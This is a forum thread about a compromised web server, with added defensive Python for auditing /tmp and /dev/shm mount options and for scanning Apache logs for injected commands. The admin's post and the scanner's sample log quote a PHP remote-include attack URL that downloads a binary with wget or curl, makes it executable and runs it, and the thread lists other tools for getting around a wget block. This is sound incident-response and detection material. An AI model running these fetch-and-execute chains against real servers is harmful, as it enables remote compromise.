dlc2000
09-04-2004, 09:03 AM
Hello,
This morning I found a DN file in the /tmp directory of my two servers. The file is compiled and its permissions were set to 755. I also ran ps -aux | grep nobody and saw 4 processes with "ps a". What type of script is this?
thx
dlc2000
09-04-2004, 09:15 AM
Umm, I have also found the same file in /dev/shm :(
dlc2000
09-04-2004, 09:57 AM
OK, I have also found the script
http://sgtpeppers.net/d.txt
and the string!
http://sgtpeppers.net/d.txt?&cmd=cd%20/tmp%20;%20wget%20sgtpeppers.net/dn%20;%20chmod%20777%20dn%20;%20./dn
:angry:
Steven
09-04-2004, 10:33 AM
Typical PHP script exploit.
EXOWorks
09-04-2004, 10:36 AM
It's good that you found the script. I guess you need to secure your /tmp partition to prevent nobody from accessing it.
Steven
09-04-2004, 10:44 AM
Originally posted by Mike_R
It's good that you found the script. I guess you need to secure your /tmp partition to prevent nobody from accessing it.
Not a good idea; PHP scripts will not work.
dlc2000
09-04-2004, 12:43 PM
It is already mounted as noexec and nosuid, and I also have wget and lynx set to 000, so how is it possible that he uploaded it with wget if I have disabled it?
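dlc2000 reports /tmp mounted noexec,nosuid but also found the same dn file in /dev/shm, which is a separate tmpfs with its own mount options. The check below is an added example (not from this thread or from any of the posters): it parses /proc/mounts-format text and reports which world-writable scratch filesystems lack noexec/nosuid, resolving a path that is not its own mount (for example /var/tmp) to the nearest ancestor mount whose options it actually inherits. The sample mount table is constructed to mirror the situation in the thread; /var/tmp is added as the third usual scratch location and is my generalization, not something the thread mentions.

```python
# Mount-option audit for scratch directories, as an added example.
# Parses /proc/mounts text and flags scratch paths that can run dropped binaries.

# Options the thread relies on; nodev is commonly added as well but is not
# required here so the result matches what dlc2000 described.
REQUIRED_OPTS = ("noexec", "nosuid")
# /tmp and /dev/shm come from the thread; /var/tmp is an assumed extra location.
SCRATCH_PATHS = ("/tmp", "/dev/shm", "/var/tmp")

# Constructed /proc/mounts sample (not a real host): /tmp is hardened,
# /dev/shm is left at its defaults, /var/tmp is just a directory under /var.
SAMPLE_PROC_MOUNTS = """\
/dev/hda2 / ext3 rw 0 0
proc /proc proc rw 0 0
/dev/hda5 /tmp ext3 rw,noexec,nosuid 0 0
tmpfs /dev/shm tmpfs rw 0 0
/dev/hda3 /var ext3 rw 0 0
"""


def parse_mounts(text):
    """Return {mountpoint: set(options)} from /proc/mounts-style text.
    /proc/mounts escapes a space in a path as \\040; that is undone here."""
    mounts = {}
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint = fields[1].replace("\\040", " ")
        mounts[mountpoint] = set(fields[3].split(","))
    return mounts


def effective_options(mounts, path):
    """Options in force at `path`: those of the longest mountpoint containing it.
    Returns (options, mountpoint); a path with no own mount inherits its parent's."""
    best = None
    for mountpoint in mounts:
        prefix = mountpoint.rstrip("/") + "/"
        if path == mountpoint or path.startswith(prefix):
            if best is None or len(mountpoint) > len(best):
                best = mountpoint
    return mounts.get(best, set()), best


def audit_mounts(text, scratch=SCRATCH_PATHS, required=REQUIRED_OPTS):
    """Return {path: [missing options]} for every scratch path that is missing
    any required option, whether on its own filesystem or an inherited one."""
    mounts = parse_mounts(text)
    report = {}
    for path in scratch:
        opts, _ = effective_options(mounts, path)
        missing = [opt for opt in required if opt not in opts]
        if missing:
            report[path] = missing
    return report


if __name__ == "__main__":
    # Audit the constructed sample, then the live host if /proc/mounts exists.
    for label, text in (("sample", SAMPLE_PROC_MOUNTS),):
        print(label, audit_mounts(text))
    try:
        with open("/proc/mounts") as fh:
            print("this host", audit_mounts(fh.read()))
    except OSError:
        pass
```

On the sample table /tmp passes, while /dev/shm and /var/tmp are reported with both options missing, which is exactly the gap an attacker exploits when a script does `cd /dev/shm` instead of `cd /tmp`.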
Steven
09-04-2004, 08:08 PM
Originally posted by dlc2000
It is already mounted as noexec and nosuid, and I also have wget and lynx set to 000, so how is it possible that he uploaded it with wget if I have disabled it?
Upload it with ftp or curl, and secure with PHP. The curl binary allows uploading; also there is a binary called RCP that would allow it. SCP would allow it as well.
dlc2000
09-04-2004, 08:21 PM
Yes, OK, but the string in the Apache log reports wget, so he uploaded it with wget, but as I told you it is disabled :( bahhh
Steven
09-04-2004, 08:27 PM
Well, he could have tried wget, and then when it didn't work he tried something different? Try grepping the URL.
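The injected string dlc2000 posted (`cmd=cd%20/tmp%20;%20wget%20...%20;%20chmod%20777%20dn%20;%20./dn`) and Steven's advice to grep the logs for the URL both come down to the same task: URL-decode the query parameters of each access-log line and look for a shell command chain that fetches and runs something. The scanner below is an added example, not code from the thread or from anyone in it. It assumes Apache's common "combined" log format and an assumed vulnerable parameter named `page` carrying the remote-include URL; the log lines are constructed for the example (the hostname is reused from the thread, the IPs and timestamps are made up). It also reports which download tool each chain used, so a wget-only block that pushed the attacker to curl shows up as a second tool rather than as silence.

```python
# Apache access-log scanner for injected fetch-and-run command chains.
# Added example; log lines below are constructed, not taken from a real server.
import re
from urllib.parse import unquote, unquote_plus

# Tools an injected chain can use to pull a payload; a block on wget alone
# only moves the attacker to the next entry on this list.
FETCH_TOOLS = {"wget", "curl", "lynx", "fetch", "ftp", "scp", "rcp", "lwp-download"}
# Shell metacharacters that chain commands inside one parameter value.
SEPARATORS = re.compile(r"[;&|`]|\$\(")
# ./something after a separator or whitespace, or a chmod, marks an execute step.
EXEC_STEP = re.compile(r"(?:^|[;&|\s])\./\S+|\bchmod\b")
# Apache "combined" format: host ident user [time] "request" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: the thread's chain via wget, a retry via curl into
# /dev/shm, and two benign requests (one that merely mentions curl and wget).
# The parameter name "page" is an assumption about the vulnerable script.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2004:07:51:02 +0200] "GET /index.php?page=http://sgtpeppers.net/d.txt?&cmd=cd%20/tmp%20;%20wget%20sgtpeppers.net/dn%20;%20chmod%20777%20dn%20;%20./dn HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
203.0.113.5 - - [04/Sep/2004:07:53:40 +0200] "GET /index.php?page=http://sgtpeppers.net/d.txt?&cmd=cd%20/dev/shm%3Bcurl%20-o%20dn%20sgtpeppers.net/dn%3Bchmod%20755%20dn%3B./dn HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Sep/2004:08:10:11 +0200] "GET /index.php?page=news&id=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Sep/2004:08:12:00 +0200] "GET /search.php?q=curl%20vs%20wget HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""


def decode_query(target):
    """Split a request target into (path, [(name, decoded_value), ...]).
    Splits on '&' only, so a literal ';' inside a payload survives, and decodes
    twice to catch a chain that was percent-encoded before being passed on."""
    path, _, query = target.partition("?")
    pairs = []
    for field in query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote(unquote_plus(value))))
    return path, pairs


def scan_line(line):
    """Return a finding dict for the first parameter carrying a fetch-and-run
    chain, or None for a line that does not parse or looks benign."""
    match = LOG_RE.match(line)
    if not match:
        return None
    path, params = decode_query(match.group("target"))
    for name, value in params:
        if not SEPARATORS.search(value):
            continue  # no command chaining; "curl vs wget" as a search term is fine
        words = re.findall(r"[A-Za-z_][\w-]*", value)
        tools = sorted({w for w in words if w in FETCH_TOOLS})
        runs_payload = bool(EXEC_STEP.search(value))
        if tools or runs_payload:
            return {"ip": match.group("ip"), "time": match.group("ts"), "path": path,
                    "param": name, "tools": tools, "exec": runs_payload,
                    "command": value}
    return None


def scan_log(text):
    """All findings for a whole log, in file order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


def fetch_tools_seen(text):
    """Sorted set of download tools used across every flagged request."""
    return sorted({tool for f in scan_log(text) for tool in f["tools"]})


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["param"], finding["tools"], finding["command"])
    print("tools used:", fetch_tools_seen(SAMPLE_LOG))
```

Run against a real access_log, the `command` field gives the decoded chain to work from and `fetch_tools_seen` answers Steven's question directly: if wget is blocked and the attacker fell back to curl, both show up.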
WebProx
09-11-2004, 05:08 PM
Originally posted by thelinuxguy
Upload it with ftp or curl, and secure with PHP. The curl binary allows uploading; also there is a binary called RCP that would allow it. SCP would allow it as well.
Steve, do you recommend that we block scp, curl, rcp and ftp through mod_security, like wget?